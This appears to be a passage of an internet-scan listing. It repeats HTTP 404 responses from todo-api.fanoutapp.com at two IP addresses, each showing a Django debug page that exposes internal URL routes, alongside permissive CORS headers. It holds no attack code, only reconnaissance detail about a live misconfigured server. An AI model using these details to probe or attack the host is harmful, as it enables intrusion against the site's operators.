</ol>
<p>The current URL, <code></code>, didn't match any of these.</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
Open service 151.101.1.91:443 · todo-api.fanoutapp.com
2026-01-02 22:01
HTTP/1.1 404 NOT FOUND
Connection: close
Content-Length: 2140
Date: Fri, 02 Jan 2026 22:01:11 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, POST, PUT, DELETE
Access-Control-Expose-Headers: Date, Server, X-Frame-Options
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Page title: Page not found at /
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://todo-api.fanoutapp.com/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>server.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
^todos/(?P<list_id>[^/]+)/items/$
[name='todos']
</li>
<li>
^todos/(?P<list_id>[^/]+)/items/(?P<item_id>[^/]+)/$
[name='todos-item']
</li>
</ol>
<p>The current URL, <code></code>, didn't match any of these.</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
Open service 34.27.193.201:80 · todo-api.fanoutapp.com
2026-01-02 19:22
HTTP/1.1 404 NOT FOUND
Date: Fri, 02 Jan 2026 19:23:00 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, POST, PUT, DELETE
Access-Control-Expose-Headers: Date, Server, X-Frame-Options
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Transfer-Encoding: chunked
Connection: close, Transfer-Encoding
Page title: Page not found at /
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://todo-api.fanoutapp.com/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>server.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
^todos/(?P<list_id>[^/]+)/items/$
[name='todos']
</li>
<li>
^todos/(?P<list_id>[^/]+)/items/(?P<item_id>[^/]+)/$
[name='todos-item']
</li>
</ol>
<p>The current URL, <code></code>, didn't match any of these.</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
Open service 151.101.1.91:443 · todo-api.fanoutapp.com
2025-12-23 04:11
HTTP/1.1 404 NOT FOUND
Connection: close
Content-Length: 2140
Date: Tue, 23 Dec 2025 04:11:21 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, POST, PUT, DELETE
Access-Control-Expose-Headers: Date, Server, X-Frame-Options
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Page title: Page not found at /
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://todo-api.fanoutapp.com/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>server.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
^todos/(?P<list_id>[^/]+)/items/$
[name='todos']
</li>
<li>
^todos/(?P<list_id>[^/]+)/items/(?P<item_id>[^/]+)/$
[name='todos-item']
</li>
</ol>
<p>The current URL, <code></code>, didn't match any of these.</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
Open service 34.27.193.201:80 · todo-api.fanoutapp.com
2025-12-22 21:06
HTTP/1.1 404 NOT FOUND
Date: Mon, 22 Dec 2025 21:06:58 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, POST, PUT, DELETE
Access-Control-Expose-Headers: Date, Server, X-Frame-Options
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Content-Length: 2140
Connection: close
Page title: Page not found at /
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://todo-api.fanoutapp.com/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>server.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
^todos/(?P<list_id>[^/]+)/items/$
[name='todos']
</li>
<li>
^todos/(?P<list_id>[^/]+)/items/(?P<item_id>[^/]+)/$
[name='todos-item']
</li>
</ol>
<p>The current URL, <code></code>, didn't match any of these.</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
Open service 151.101.1.91:443 · todo-api.fanoutapp.com
2025-12-21 10:13
HTTP/1.1 404 NOT FOUND
Connection: close
Content-Length: 2140
Date: Sun, 21 Dec 2025 10:13:36 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, POST, PUT, DELETE
Access-Control-Expose-Headers: Date, Server, X-Frame-Options
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Page title: Page not found at /
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://todo-api.fanoutapp.com/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>server.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
^todos/(?P<list_id>[^/]+)/items/$
[name='todos']
</li>
<li>
^todos/(?P<list_id>[^/]+)/items/(?P<item_id>[^/]+)/$
[name='todos-item']
</li>
</ol>
<p>The current URL, <code></code>, didn't match any of these.</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
Open service 34.27.193.201:80 · todo-api.fanoutapp.com
2025-12-20 21:49
HTTP/1.1 404 NOT FOUND
Date: Sat, 20 Dec 2025 21:49:28 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, POST, PUT, DELETE
Access-Control-Expose-Headers: Date, Server, X-Frame-Options
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Content-Length: 2140
Connection: close
Page title: Page not found at /
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://todo-api.fanoutapp.com/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>server.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
^todos/(?P<list_id>[^/]+)/items/$
[name='todos']
</li>
<li>
^todos/(?P<list_id>[^/]+)/items/(?P<item_id>[^/]+)/$
[name='todos-item']
</li>
</ol>
<p>The current URL, <code></code>, didn't match any of these.</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>
Open service 151.101.1.91:443 · todo-api.fanoutapp.com
2025-12-19 00:01
HTTP/1.1 404 NOT FOUND
Connection: close
Content-Length: 2140
Date: Fri, 19 Dec 2025 00:01:28 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Frame-Options: SAMEORIGIN
Content-Type: text/html
Access-Control-Allow-Methods: OPTIONS, HEAD, GET, POST, PUT, DELETE
Access-Control-Expose-Headers: Date, Server, X-Frame-Options
Access-Control-Allow-Credentials: true
Access-Control-Allow-Origin: *
Access-Control-Max-Age: 3600
Page title: Page not found at /
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<title>Page not found at /</title>
<meta name="robots" content="NONE,NOARCHIVE">
<style type="text/css">
html * { padding:0; margin:0; }
body * { padding:10px 20px; }
body * * { padding:0; }
body { font:small sans-serif; background:#eee; }
body>div { border-bottom:1px solid #ddd; }
h1 { font-weight:normal; margin-bottom:.4em; }
h1 span { font-size:60%; color:#666; font-weight:normal; }
table { border:none; border-collapse: collapse; width:100%; }
td, th { vertical-align:top; padding:2px 3px; }
th { width:12em; text-align:right; color:#666; padding-right:.5em; }
#info { background:#f6f6f6; }
#info ol { margin: 0.5em 4em; }
#info ol li { font-family: monospace; }
#summary { background: #ffc; }
#explanation { background:#eee; border-bottom: 0px none; }
</style>
</head>
<body>
<div id="summary">
<h1>Page not found <span>(404)</span></h1>
<table class="meta">
<tr>
<th>Request Method:</th>
<td>GET</td>
</tr>
<tr>
<th>Request URL:</th>
<td>http://todo-api.fanoutapp.com/</td>
</tr>
</table>
</div>
<div id="info">
<p>
Using the URLconf defined in <code>server.urls</code>,
Django tried these URL patterns, in this order:
</p>
<ol>
<li>
^todos/(?P<list_id>[^/]+)/items/$
[name='todos']
</li>
<li>
^todos/(?P<list_id>[^/]+)/items/(?P<item_id>[^/]+)/$
[name='todos-item']
</li>
</ol>
<p>The current URL, <code></code>, didn't match any of these.</p>
</div>
<div id="explanation">
<p>
You're seeing this error because you have <code>DEBUG = True</code> in
your Django settings file. Change that to <code>False</code>, and Django
will display a standard 404 page.
</p>
</div>
</body>
</html>